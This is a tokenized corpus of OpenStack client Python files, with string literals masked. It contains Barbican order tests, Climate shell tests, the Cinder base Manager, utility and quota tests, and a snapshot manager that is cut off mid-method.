test_get_order_defaults_metadata ( self ) : <EOL> """<STR_LIT>""" <EOL> order = self . barbicanclient . orders . create_key ( <EOL> ** order_create_key_data ) <EOL> order_ref = self . cleanup . add_entity ( order ) <EOL> self . assertIsNotNone ( order_ref ) <EOL> order_resp = self . barbicanclient . orders . get ( order_ref ) <EOL> self . assertTrue ( order_resp . status == "<STR_LIT>" or <EOL> order_resp . status == "<STR_LIT>" ) <EOL> self . assertEqual ( order . name , <EOL> order_resp . name ) <EOL> self . assertEqual ( order . mode , <EOL> order_resp . mode ) <EOL> self . assertEqual ( order . algorithm , <EOL> order_resp . algorithm ) <EOL> self . assertEqual ( order . bit_length , <EOL> order_resp . bit_length ) <EOL> self . assertEqual ( order . payload_content_type , <EOL> order_resp . payload_content_type ) <EOL> @ testcase . attr ( '<STR_LIT>' ) <EOL> def test_get_order_defaults ( self ) : <EOL> """<STR_LIT>""" <EOL> order = self . barbicanclient . orders . create_key ( <EOL> ** order_create_key_data ) <EOL> order_ref = self . cleanup . add_entity ( order ) <EOL> self . assertIsNotNone ( order_ref ) <EOL> order_resp = self . barbicanclient . orders . get ( order_ref ) <EOL> self . assertIsNotNone ( order_resp . order_ref ) <EOL> self . assertEqual ( '<STR_LIT:key>' , order_resp . _type ) <EOL> self . assertTrue ( order_resp . status == "<STR_LIT>" or <EOL> order_resp . status == "<STR_LIT>" ) <EOL> if order_resp . status == "<STR_LIT>" : <EOL> self . assertIsNotNone ( order_resp . secret_ref ) <EOL> @ testcase . attr ( '<STR_LIT>' ) <EOL> def test_delete_order_defaults ( self ) : <EOL> """<STR_LIT>""" <EOL> order = self . barbicanclient . orders . create_key ( <EOL> ** order_create_key_data ) <EOL> order_ref = order . submit ( ) <EOL> secret_ref = self . barbicanclient . orders . get ( order_ref ) . secret_ref <EOL> delete_resp = self . barbicanclient . orders . delete ( order_ref ) <EOL> self . assertIsNone ( delete_resp ) <EOL> self . barbicanclient . secrets . delete ( secret_ref ) <EOL> @ testcase . attr ( '<STR_LIT>' ) <EOL> def test_get_orders_defaults ( self ) : <EOL> """<STR_LIT>""" <EOL> limit = <NUM_LIT:7> <EOL> offset = <NUM_LIT:0> <EOL> total = <NUM_LIT:10> <EOL> for i in range ( <NUM_LIT:0> , total + <NUM_LIT:1> ) : <EOL> order = self . barbicanclient . orders . create_key ( <EOL> ** order_create_key_data ) <EOL> order_ref = self . cleanup . add_entity ( order ) <EOL> self . assertIsNotNone ( order_ref ) <EOL> orders_list = self . barbicanclient . orders . list ( limit = limit , <EOL> offset = offset ) <EOL> self . assertEqual ( limit , len ( orders_list ) ) </s>
<s> import re <EOL> import six <EOL> import sys <EOL> import fixtures <EOL> import testtools <EOL> from climateclient import shell <EOL> from climateclient import tests <EOL> FAKE_ENV = { '<STR_LIT>' : '<STR_LIT:username>' , <EOL> '<STR_LIT>' : '<STR_LIT:password>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> class ClimateShellTestCase ( tests . TestCase ) : <EOL> def make_env ( self , exclude = None , fake_env = FAKE_ENV ) : <EOL> env = dict ( ( k , v ) for k , v in fake_env . items ( ) if k != exclude ) <EOL> self . useFixture ( fixtures . MonkeyPatch ( '<STR_LIT>' , env ) ) <EOL> def setUp ( self ) : <EOL> super ( ClimateShellTestCase , self ) . setUp ( ) <EOL> self . climate_shell = shell . ClimateShell ( ) <EOL> def shell ( self , argstr , exitcodes = ( <NUM_LIT:0> , ) ) : <EOL> orig = sys . stdout <EOL> orig_stderr = sys . stderr <EOL> try : <EOL> sys . stdout = six . StringIO ( ) <EOL> sys . stderr = six . StringIO ( ) <EOL> _shell = shell . ClimateShell ( ) <EOL> _shell . initialize_app ( argstr . split ( ) ) <EOL> except SystemExit : <EOL> exc_type , exc_value , exc_traceback = sys . exc_info ( ) <EOL> self . assertIn ( exc_value . code , exitcodes ) <EOL> finally : <EOL> stdout = sys . stdout . getvalue ( ) <EOL> sys . stdout . close ( ) <EOL> sys . stdout = orig <EOL> stderr = sys . stderr . getvalue ( ) <EOL> sys . stderr . close ( ) <EOL> sys . stderr = orig_stderr <EOL> return ( stdout , stderr ) <EOL> def test_help_unknown_command ( self ) : <EOL> self . assertRaises ( ValueError , self . shell , '<STR_LIT>' ) <EOL> @ testtools . skip ( '<STR_LIT>' ) <EOL> def test_bash_completion ( self ) : <EOL> stdout , stderr = self . shell ( '<STR_LIT>' ) <EOL> required = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> for r in required : <EOL> self . assertThat ( ( stdout + stderr ) , <EOL> testtools . matchers . MatchesRegex ( <EOL> r , re . DOTALL | re . MULTILINE ) ) <EOL> @ testtools . skip ( '<STR_LIT>' ) <EOL> def test_authenticate_user ( self ) : <EOL> obj = shell . ClimateShell ( ) <EOL> obj . initialize_app ( '<STR_LIT>' ) <EOL> obj . options . os_token = '<STR_LIT>' <EOL> obj . options . os_cacert = '<STR_LIT>' <EOL> obj . authenticate_user ( ) </s>
<s> """<STR_LIT>""" <EOL> import abc <EOL> import contextlib <EOL> import hashlib <EOL> import os <EOL> import six <EOL> from six . moves . urllib import parse <EOL> from cinderclient import api_versions <EOL> from cinderclient import exceptions <EOL> from cinderclient . openstack . common . apiclient import base as common_base <EOL> from cinderclient import utils <EOL> SORT_DIR_VALUES = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> SORT_KEY_VALUES = ( '<STR_LIT:id>' , '<STR_LIT:status>' , '<STR_LIT:size>' , '<STR_LIT>' , '<STR_LIT:name>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> SORT_KEY_MAPPINGS = { '<STR_LIT:name>' : '<STR_LIT>' } <EOL> SORT_KEY_ADD_VALUES = { '<STR_LIT>' : ( '<STR_LIT>' , ) , } <EOL> Resource = common_base . Resource <EOL> def getid ( obj ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return obj . id <EOL> except AttributeError : <EOL> return obj <EOL> class Manager ( common_base . HookableMixin ) : <EOL> """<STR_LIT>""" <EOL> resource_class = None <EOL> def __init__ ( self , api ) : <EOL> self . _api_version = api_versions . APIVersion ( ) <EOL> self . api = api <EOL> @ property <EOL> def api_version ( self ) : <EOL> return self . _api_version <EOL> def _list ( self , url , response_key , obj_class = None , body = None , <EOL> limit = None , items = None ) : <EOL> resp = None <EOL> if items is None : <EOL> items = [ ] <EOL> if body : <EOL> resp , body = self . api . client . post ( url , body = body ) <EOL> else : <EOL> resp , body = self . api . client . get ( url ) <EOL> if obj_class is None : <EOL> obj_class = self . resource_class <EOL> data = body [ response_key ] <EOL> if isinstance ( data , dict ) : <EOL> try : <EOL> data = data [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> pass <EOL> with self . completion_cache ( '<STR_LIT>' , obj_class , mode = "<STR_LIT:w>" ) : <EOL> with self . completion_cache ( '<STR_LIT>' , obj_class , mode = "<STR_LIT:w>" ) : <EOL> items_new = [ obj_class ( self , res , loaded = True ) <EOL> for res in data if res ] <EOL> if limit : <EOL> limit = int ( limit ) <EOL> margin = limit - len ( items ) <EOL> if margin <= len ( items_new ) : <EOL> items = items + items_new [ : margin ] <EOL> return common_base . ListWithMeta ( items , resp ) <EOL> else : <EOL> items = items + items_new <EOL> else : <EOL> items = items + items_new <EOL> next = None <EOL> if '<STR_LIT>' in body : <EOL> volumes_links = body [ '<STR_LIT>' ] <EOL> if volumes_links : <EOL> for volumes_link in volumes_links : <EOL> if '<STR_LIT>' in volumes_link and '<STR_LIT>' == volumes_link [ '<STR_LIT>' ] : <EOL> next = volumes_link [ '<STR_LIT>' ] <EOL> break <EOL> if next : <EOL> items = self . _list ( next , response_key , obj_class , None , <EOL> limit , items ) <EOL> return common_base . ListWithMeta ( items , resp ) <EOL> def _build_list_url ( self , resource_type , detailed = True , search_opts = None , <EOL> marker = None , limit = None , sort_key = None , sort_dir = None , <EOL> sort = None ) : <EOL> if search_opts is None : <EOL> search_opts = { } <EOL> query_params = { } <EOL> for key , val in search_opts . items ( ) : <EOL> if val : <EOL> query_params [ key ] = val <EOL> if marker : <EOL> query_params [ '<STR_LIT>' ] = marker <EOL> if limit : <EOL> query_params [ '<STR_LIT>' ] = limit <EOL> if sort : <EOL> query_params [ '<STR_LIT>' ] = self . _format_sort_param ( sort , <EOL> resource_type ) <EOL> else : <EOL> if sort_key : <EOL> query_params [ '<STR_LIT>' ] = self . _format_sort_key_param ( <EOL> sort_key , <EOL> resource_type ) <EOL> if sort_dir : <EOL> query_params [ '<STR_LIT>' ] = self . _format_sort_dir_param ( <EOL> sort_dir ) <EOL> query_string = "<STR_LIT>" <EOL> if query_params : <EOL> params = sorted ( query_params . items ( ) , key = lambda x : x [ <NUM_LIT:0> ] ) <EOL> query_string = "<STR_LIT>" % parse . urlencode ( params ) <EOL> detail = "<STR_LIT>" <EOL> if detailed : <EOL> detail = "<STR_LIT>" <EOL> return ( "<STR_LIT>" % <EOL> { "<STR_LIT>" : resource_type , "<STR_LIT>" : detail , <EOL> "<STR_LIT>" : query_string } ) <EOL> def _format_sort_param ( self , sort , resource_type = None ) : <EOL> '''<STR_LIT>''' <EOL> if not sort : <EOL> return None <EOL> if isinstance ( sort , six . string_types ) : <EOL> sort = [ s for s in sort . split ( '<STR_LIT:U+002C>' ) if s ] <EOL> sort_array = [ ] <EOL> for sort_item in sort : <EOL> if isinstance ( sort_item , tuple ) : <EOL> sort_key = sort_item [ <NUM_LIT:0> ] <EOL> sort_dir = sort_item [ <NUM_LIT:1> ] <EOL> else : <EOL> sort_key , _sep , sort_dir = sort_item . partition ( '<STR_LIT::>' ) <EOL> sort_key = sort_key . strip ( ) <EOL> sort_key = self . _format_sort_key_param ( sort_key , resource_type ) <EOL> if sort_dir : <EOL> sort_dir = sort_dir . strip ( ) <EOL> if sort_dir not in SORT_DIR_VALUES : <EOL> msg = ( '<STR_LIT>' <EOL> % '<STR_LIT:U+002CU+0020>' . join ( SORT_DIR_VALUES ) ) <EOL> raise ValueError ( msg ) <EOL> sort_array . append ( '<STR_LIT>' % ( sort_key , sort_dir ) ) <EOL> else : <EOL> sort_array . append ( sort_key ) <EOL> return '<STR_LIT:U+002C>' . join ( sort_array ) <EOL> def _format_sort_key_param ( self , sort_key , resource_type = None ) : <EOL> valid_sort_keys = SORT_KEY_VALUES <EOL> if resource_type : <EOL> add_sort_keys = SORT_KEY_ADD_VALUES . get ( resource_type , None ) <EOL> if add_sort_keys : <EOL> valid_sort_keys += add_sort_keys <EOL> if sort_key in valid_sort_keys : <EOL> return SORT_KEY_MAPPINGS . get ( sort_key , sort_key ) <EOL> msg = ( '<STR_LIT>' % <EOL> '<STR_LIT:U+002CU+0020>' . join ( valid_sort_keys ) ) <EOL> raise ValueError ( msg ) <EOL> def _format_sort_dir_param ( self , sort_dir ) : <EOL> if sort_dir in SORT_DIR_VALUES : <EOL> return sort_dir <EOL> msg = ( '<STR_LIT>' <EOL> % '<STR_LIT:U+002CU+0020>' . join ( SORT_DIR_VALUES ) ) <EOL> raise ValueError ( msg ) <EOL> @ contextlib . contextmanager <EOL> def completion_cache ( self , cache_type , obj_class , mode ) : <EOL> """<STR_LIT>""" <EOL> base_dir = utils . env ( '<STR_LIT>' , <EOL> default = "<STR_LIT>" ) <EOL> username = utils . env ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> url = utils . env ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> uniqifier = hashlib . md5 ( username . encode ( '<STR_LIT:utf-8>' ) + <EOL> url . encode ( '<STR_LIT:utf-8>' ) ) . hexdigest ( ) <EOL> cache_dir = os . path . expanduser ( os . path . join ( base_dir , uniqifier ) ) <EOL> try : <EOL> os . makedirs ( cache_dir , <NUM_LIT> ) <EOL> except OSError : <EOL> pass <EOL> resource = obj_class . __name__ . lower ( ) <EOL> filename = "<STR_LIT>" % ( resource , cache_type . replace ( '<STR_LIT:_>' , '<STR_LIT:->' ) ) <EOL> path = os . path . join ( cache_dir , filename ) <EOL> cache_attr = "<STR_LIT>" % cache_type <EOL> try : <EOL> setattr ( self , cache_attr , open ( path , mode ) ) <EOL> except IOError : <EOL> pass <EOL> try : <EOL> yield <EOL> finally : <EOL> cache = getattr ( self , cache_attr , None ) <EOL> if cache : <EOL> cache . close ( ) <EOL> delattr ( self , cache_attr ) <EOL> def write_to_completion_cache ( self , cache_type , val ) : <EOL> cache = getattr ( self , "<STR_LIT>" % cache_type , None ) <EOL> if cache : <EOL> cache . write ( "<STR_LIT>" % val ) <EOL> def _get ( self , url , response_key = None ) : <EOL> resp , body = self . api . client . get ( url ) <EOL> if response_key : <EOL> return self . resource_class ( self , body [ response_key ] , loaded = True , <EOL> resp = resp ) <EOL> else : <EOL> return self . resource_class ( self , body , loaded = True , resp = resp ) <EOL> def _create ( self , url , body , response_key , return_raw = False , ** kwargs ) : <EOL> self . run_hooks ( '<STR_LIT>' , body , ** kwargs ) <EOL> resp , body = self . api . client . post ( url , body = body ) <EOL> if return_raw : <EOL> return common_base . DictWithMeta ( body [ response_key ] , resp ) <EOL> with self . completion_cache ( '<STR_LIT>' , self . resource_class , mode = "<STR_LIT:a>" ) : <EOL> with self . completion_cache ( '<STR_LIT>' , self . resource_class , mode = "<STR_LIT:a>" ) : <EOL> return self . resource_class ( self , body [ response_key ] , resp = resp ) <EOL> def _delete ( self , url ) : <EOL> resp , body = self . api . client . delete ( url ) <EOL> return common_base . TupleWithMeta ( ( resp , body ) , resp ) <EOL> def _update ( self , url , body , response_key = None , ** kwargs ) : <EOL> self . run_hooks ( '<STR_LIT>' , body , ** kwargs ) <EOL> resp , body = self . api . client . put ( url , body = body ) <EOL> if response_key : <EOL> return self . resource_class ( self , body [ response_key ] , loaded = True , <EOL> resp = resp ) <EOL> body = body or { } <EOL> return common_base . DictWithMeta ( body , resp ) <EOL> class ManagerWithFind ( six . with_metaclass ( abc . ABCMeta , Manager ) ) : <EOL> """<STR_LIT>""" <EOL> @ abc . abstractmethod <EOL> def list ( self ) : <EOL> pass <EOL> def find ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> matches = self . findall ( ** kwargs ) <EOL> num_matches = len ( matches ) <EOL> if num_matches == <NUM_LIT:0> : <EOL> msg = "<STR_LIT>" % ( self . resource_class . __name__ , kwargs ) <EOL> raise exceptions . NotFound ( <NUM_LIT> , msg ) <EOL> elif num_matches > <NUM_LIT:1> : <EOL> raise exceptions . NoUniqueMatch <EOL> else : <EOL> matches [ <NUM_LIT:0> ] . append_request_ids ( matches . request_ids ) <EOL> return matches [ <NUM_LIT:0> ] <EOL> def findall ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> search_opts = { '<STR_LIT>' : <NUM_LIT:1> } <EOL> if '<STR_LIT:name>' in kwargs : <EOL> search_opts [ '<STR_LIT:name>' ] = kwargs [ '<STR_LIT:name>' ] <EOL> elif '<STR_LIT>' in kwargs : <EOL> search_opts [ '<STR_LIT>' ] = kwargs [ '<STR_LIT>' ] <EOL> found = common_base . ListWithMeta ( [ ] , None ) <EOL> searches = kwargs . items ( ) <EOL> listing = self . list ( search_opts = search_opts ) <EOL> found . append_request_ids ( listing . request_ids ) <EOL> for obj in listing : <EOL> try : <EOL> if all ( getattr ( obj , attr ) == value <EOL> for ( attr , value ) in searches ) : <EOL> found . append ( obj ) <EOL> except AttributeError : <EOL> continue <EOL> return found </s>
<s> import collections <EOL> import sys <EOL> import mock <EOL> from six import moves <EOL> from cinderclient import exceptions <EOL> from cinderclient import utils <EOL> from cinderclient import base <EOL> from cinderclient . openstack . common . apiclient import base as common_base <EOL> from cinderclient . tests . unit import utils as test_utils <EOL> from cinderclient . tests . unit . v2 import fakes <EOL> UUID = '<STR_LIT>' <EOL> class FakeResource ( object ) : <EOL> NAME_ATTR = '<STR_LIT:name>' <EOL> def __init__ ( self , _id , properties ) : <EOL> self . id = _id <EOL> try : <EOL> self . name = properties [ '<STR_LIT:name>' ] <EOL> except KeyError : <EOL> pass <EOL> def append_request_ids ( self , resp ) : <EOL> pass <EOL> class FakeManager ( base . ManagerWithFind ) : <EOL> resource_class = FakeResource <EOL> resources = [ <EOL> FakeResource ( '<STR_LIT>' , { '<STR_LIT:name>' : '<STR_LIT>' } ) , <EOL> FakeResource ( UUID , { '<STR_LIT:name>' : '<STR_LIT>' } ) , <EOL> FakeResource ( '<STR_LIT>' , { '<STR_LIT:name>' : '<STR_LIT>' } ) <EOL> ] <EOL> def get ( self , resource_id ) : <EOL> for resource in self . resources : <EOL> if resource . id == str ( resource_id ) : <EOL> return resource <EOL> raise exceptions . NotFound ( resource_id ) <EOL> def list ( self , search_opts ) : <EOL> return common_base . ListWithMeta ( self . resources , fakes . REQUEST_ID ) <EOL> class FakeDisplayResource ( object ) : <EOL> NAME_ATTR = '<STR_LIT>' <EOL> def __init__ ( self , _id , properties ) : <EOL> self . id = _id <EOL> try : <EOL> self . display_name = properties [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> pass <EOL> def append_request_ids ( self , resp ) : <EOL> pass <EOL> class FakeDisplayManager ( FakeManager ) : <EOL> resource_class = FakeDisplayResource <EOL> resources = [ <EOL> FakeDisplayResource ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } ) , <EOL> ] <EOL> class FindResourceTestCase ( test_utils . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( FindResourceTestCase , self ) . setUp ( ) <EOL> self . manager = FakeManager ( None ) <EOL> def test_find_none ( self ) : <EOL> self . manager . find = mock . Mock ( side_effect = self . manager . find ) <EOL> self . assertRaises ( exceptions . CommandError , <EOL> utils . find_resource , <EOL> self . manager , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:2> , self . manager . find . call_count ) <EOL> def test_find_by_integer_id ( self ) : <EOL> output = utils . find_resource ( self . manager , <NUM_LIT> ) <EOL> self . assertEqual ( self . manager . get ( '<STR_LIT>' ) , output ) <EOL> def test_find_by_str_id ( self ) : <EOL> output = utils . find_resource ( self . manager , '<STR_LIT>' ) <EOL> self . assertEqual ( self . manager . get ( '<STR_LIT>' ) , output ) <EOL> def test_find_by_uuid ( self ) : <EOL> output = utils . find_resource ( self . manager , UUID ) <EOL> self . assertEqual ( self . manager . get ( UUID ) , output ) <EOL> def test_find_by_str_name ( self ) : <EOL> output = utils . find_resource ( self . manager , '<STR_LIT>' ) <EOL> self . assertEqual ( self . manager . get ( '<STR_LIT>' ) , output ) <EOL> def test_find_by_str_displayname ( self ) : <EOL> display_manager = FakeDisplayManager ( None ) <EOL> output = utils . find_resource ( display_manager , '<STR_LIT>' ) <EOL> self . assertEqual ( display_manager . get ( '<STR_LIT>' ) , output ) <EOL> class CaptureStdout ( object ) : <EOL> """<STR_LIT>""" <EOL> def __enter__ ( self ) : <EOL> self . real_stdout = sys . stdout <EOL> self . stringio = moves . StringIO ( ) <EOL> sys . stdout = self . stringio <EOL> return self <EOL> def __exit__ ( self , * args ) : <EOL> sys . stdout = self . real_stdout <EOL> self . stringio . seek ( <NUM_LIT:0> ) <EOL> self . read = self . stringio . read <EOL> class PrintListTestCase ( test_utils . TestCase ) : <EOL> def test_print_list_with_list ( self ) : <EOL> Row = collections . namedtuple ( '<STR_LIT>' , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> to_print = [ Row ( a = <NUM_LIT:3> , b = <NUM_LIT:4> ) , Row ( a = <NUM_LIT:1> , b = <NUM_LIT:2> ) ] <EOL> with CaptureStdout ( ) as cso : <EOL> utils . print_list ( to_print , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> self . assertEqual ( """<STR_LIT>""" , cso . read ( ) ) <EOL> def test_print_list_with_None_data ( self ) : <EOL> Row = collections . namedtuple ( '<STR_LIT>' , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> to_print = [ Row ( a = <NUM_LIT:3> , b = None ) , Row ( a = <NUM_LIT:1> , b = <NUM_LIT:2> ) ] <EOL> with CaptureStdout ( ) as cso : <EOL> utils . print_list ( to_print , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> self . assertEqual ( """<STR_LIT>""" , cso . read ( ) ) <EOL> def test_print_list_with_list_sortby ( self ) : <EOL> Row = collections . namedtuple ( '<STR_LIT>' , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> to_print = [ Row ( a = <NUM_LIT:4> , b = <NUM_LIT:3> ) , Row ( a = <NUM_LIT:2> , b = <NUM_LIT:1> ) ] <EOL> with CaptureStdout ( ) as cso : <EOL> utils . print_list ( to_print , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] , sortby_index = <NUM_LIT:1> ) <EOL> self . assertEqual ( """<STR_LIT>""" , cso . read ( ) ) <EOL> def test_print_list_with_list_no_sort ( self ) : <EOL> Row = collections . namedtuple ( '<STR_LIT>' , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> to_print = [ Row ( a = <NUM_LIT:3> , b = <NUM_LIT:4> ) , Row ( a = <NUM_LIT:1> , b = <NUM_LIT:2> ) ] <EOL> with CaptureStdout ( ) as cso : <EOL> utils . print_list ( to_print , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] , sortby_index = None ) <EOL> self . assertEqual ( """<STR_LIT>""" , cso . read ( ) ) <EOL> def test_print_list_with_generator ( self ) : <EOL> Row = collections . namedtuple ( '<STR_LIT>' , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> def gen_rows ( ) : <EOL> for row in [ Row ( a = <NUM_LIT:1> , b = <NUM_LIT:2> ) , Row ( a = <NUM_LIT:3> , b = <NUM_LIT:4> ) ] : <EOL> yield row <EOL> with CaptureStdout ( ) as cso : <EOL> utils . print_list ( gen_rows ( ) , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> self . assertEqual ( """<STR_LIT>""" , cso . read ( ) ) <EOL> def test_print_list_with_return ( self ) : <EOL> Row = collections . namedtuple ( '<STR_LIT>' , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> to_print = [ Row ( a = <NUM_LIT:3> , b = '<STR_LIT>' ) , Row ( a = <NUM_LIT:1> , b = '<STR_LIT>' ) ] <EOL> with CaptureStdout ( ) as cso : <EOL> utils . print_list ( to_print , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> self . assertEqual ( """<STR_LIT>""" , cso . read ( ) ) <EOL> class PrintDictTestCase ( test_utils . TestCase ) : <EOL> def test_print_dict_with_return ( self ) : <EOL> d = { '<STR_LIT:a>' : '<STR_LIT:A>' , '<STR_LIT:b>' : '<STR_LIT:B>' , '<STR_LIT:c>' : '<STR_LIT:C>' , '<STR_LIT:d>' : '<STR_LIT>' } <EOL> with CaptureStdout ( ) as cso : <EOL> utils . print_dict ( d ) <EOL> self . assertEqual ( """<STR_LIT>""" , cso . read ( ) ) </s>
<s> from cinderclient . tests . unit import utils <EOL> from cinderclient . tests . unit . v2 import fakes <EOL> cs = fakes . FakeClient ( ) <EOL> class QuotaClassSetsTest ( utils . TestCase ) : <EOL> def test_class_quotas_get ( self ) : <EOL> class_name = '<STR_LIT:test>' <EOL> cls = cs . quota_classes . get ( class_name ) <EOL> cs . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' % class_name ) <EOL> self . _assert_request_id ( cls ) <EOL> def test_update_quota ( self ) : <EOL> q = cs . quota_classes . get ( '<STR_LIT:test>' ) <EOL> q . update ( volumes = <NUM_LIT:2> , snapshots = <NUM_LIT:2> , gigabytes = <NUM_LIT> , <EOL> backups = <NUM_LIT:2> , backup_gigabytes = <NUM_LIT> , <EOL> consistencygroups = <NUM_LIT:2> , per_volume_gigabytes = <NUM_LIT:100> ) <EOL> cs . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . _assert_request_id ( q ) <EOL> def test_refresh_quota ( self ) : <EOL> q = cs . quota_classes . get ( '<STR_LIT:test>' ) <EOL> q2 = cs . quota_classes . get ( '<STR_LIT:test>' ) <EOL> self . assertEqual ( q . volumes , q2 . volumes ) <EOL> self . assertEqual ( q . snapshots , q2 . snapshots ) <EOL> self . assertEqual ( q . gigabytes , q2 . gigabytes ) <EOL> self . assertEqual ( q . backups , q2 . backups ) <EOL> self . assertEqual ( q . backup_gigabytes , q2 . backup_gigabytes ) <EOL> self . assertEqual ( q . consistencygroups , q2 . consistencygroups ) <EOL> self . assertEqual ( q . per_volume_gigabytes , q2 . per_volume_gigabytes ) <EOL> q2 . volumes = <NUM_LIT:0> <EOL> self . assertNotEqual ( q . volumes , q2 . volumes ) <EOL> q2 . snapshots = <NUM_LIT:0> <EOL> self . assertNotEqual ( q . snapshots , q2 . snapshots ) <EOL> q2 . gigabytes = <NUM_LIT:0> <EOL> self . assertNotEqual ( q . gigabytes , q2 . gigabytes ) <EOL> q2 . backups = <NUM_LIT:0> <EOL> self . assertNotEqual ( q . backups , q2 . backups ) <EOL> q2 . backup_gigabytes = <NUM_LIT:0> <EOL> self . assertNotEqual ( q . backup_gigabytes , q2 . backup_gigabytes ) <EOL> q2 . consistencygroups = <NUM_LIT:0> <EOL> self . assertNotEqual ( q . consistencygroups , q2 . consistencygroups ) <EOL> q2 . per_volume_gigabytes = <NUM_LIT:0> <EOL> self . assertNotEqual ( q . per_volume_gigabytes , q2 . per_volume_gigabytes ) <EOL> q2 . get ( ) <EOL> self . assertEqual ( q . volumes , q2 . volumes ) <EOL> self . assertEqual ( q . snapshots , q2 . snapshots ) <EOL> self . assertEqual ( q . gigabytes , q2 . gigabytes ) <EOL> self . assertEqual ( q . backups , q2 . backups ) <EOL> self . assertEqual ( q . backup_gigabytes , q2 . backup_gigabytes ) <EOL> self . assertEqual ( q . consistencygroups , q2 . consistencygroups ) <EOL> self . assertEqual ( q . per_volume_gigabytes , q2 . per_volume_gigabytes ) <EOL> self . _assert_request_id ( q ) <EOL> self . _assert_request_id ( q2 ) </s>
<s> """<STR_LIT>""" <EOL> import six <EOL> from six . moves . urllib . parse import urlencode <EOL> from cinderclient import base <EOL> class Snapshot ( base . Resource ) : <EOL> """<STR_LIT>""" <EOL> NAME_ATTR = "<STR_LIT>" <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % self . id <EOL> def delete ( self ) : <EOL> """<STR_LIT>""" <EOL> self . manager . delete ( self ) <EOL> def update ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . manager . update ( self , ** kwargs ) <EOL> @ property <EOL> def progress ( self ) : <EOL> return self . _info . get ( '<STR_LIT>' ) <EOL> @ property <EOL> def project_id ( self ) : <EOL> return self . _info . get ( '<STR_LIT>' ) <EOL> def reset_state ( self , state ) : <EOL> """<STR_LIT>""" <EOL> self . manager . reset_state ( self , state ) <EOL> def set_metadata ( self , metadata ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . set_metadata ( self , metadata ) <EOL> def delete_metadata ( self , keys ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . delete_metadata ( self , keys ) <EOL> def update_all_metadata ( self , metadata ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . update_all_metadata ( self , metadata ) <EOL> class SnapshotManager ( base . ManagerWithFind ) : <EOL> """<STR_LIT>""" <EOL> resource_class = Snapshot <EOL> def create ( self , volume_id , force = False , <EOL> display_name = None , display_description = None ) : <EOL> """<STR_LIT>""" <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : volume_id , <EOL> '<STR_LIT>' : force , <EOL> '<STR_LIT>' : display_name , <EOL> '<STR_LIT>' : display_description } } <EOL> return self . _create ( '<STR_LIT>' , body , '<STR_LIT>' ) <EOL> def get ( self , snapshot_id ) : <EOL> """<STR_LIT>""" <EOL> return self . _get ( "<STR_LIT>" % snapshot_id , "<STR_LIT>" ) <EOL> def list ( self , detailed = True , search_opts = None ) : <EOL> """<STR_LIT>""" <EOL> if search_opts is None : <EOL> search_opts = { } <EOL> qparams = { } <EOL> for opt , val in six . iteritems ( search_opts ) : <EOL> if val : <EOL> qparams [ opt ] = val <EOL> if qparams : <EOL> new_qparams = sorted ( qparams . items ( ) , key = lambda x : x [ <NUM_LIT:0> ] ) <EOL> query_string = "<STR_LIT>" % urlencode ( new_qparams ) <EOL> else : <EOL> query_string = "<STR_LIT>" <EOL> detail = "<STR_LIT>" <EOL> if detailed : <EOL> detail = "<STR_LIT>" <EOL> return self . _list ( "<STR_LIT>" % ( detail , query_string ) , <EOL> "<STR_LIT>" ) <EOL> def delete ( self , snapshot ) : <EOL> """<STR_LIT>""" <EOL> self . _delete ( "<STR_LIT>" % base . getid ( snapshot ) ) <EOL> def update ( self , snapshot , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if not kwargs : <EOL> return <EOL> body = { "<STR_LIT>" : kwargs } <EOL> self . _update ( "<STR_LIT>" % base . getid ( snapshot ) , body ) <EOL> def reset_state ( self , snapshot , state ) : <EOL> """<STR_LIT>""" <EOL> return self . _action ( '<STR_LIT>' , snapshot , { '<STR_LIT:status>' : state } ) <EOL> def _action ( self , action , snapshot , info = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> body = { action : info } <EOL> self . run_hooks ( '<STR_LIT>' , body , ** kwargs ) <EOL> url = '<STR_LIT>' % base . getid ( snapshot ) <EOL> return self . api . client . post ( url , body = body ) <EOL> def update_snapshot_status ( self , snapshot , update_dict ) : <EOL> return self . _action ( '<STR_LIT>' , <EOL> base . getid ( snapshot ) , update_dict ) <EOL> def set_metadata ( self , snapshot , metadata ) : <EOL> """<STR_LIT>""" <EOL> body = { '<STR_LIT>' : metadata } <EOL> return self . _create ( "<STR_LIT>" % base . getid ( snapshot ) , 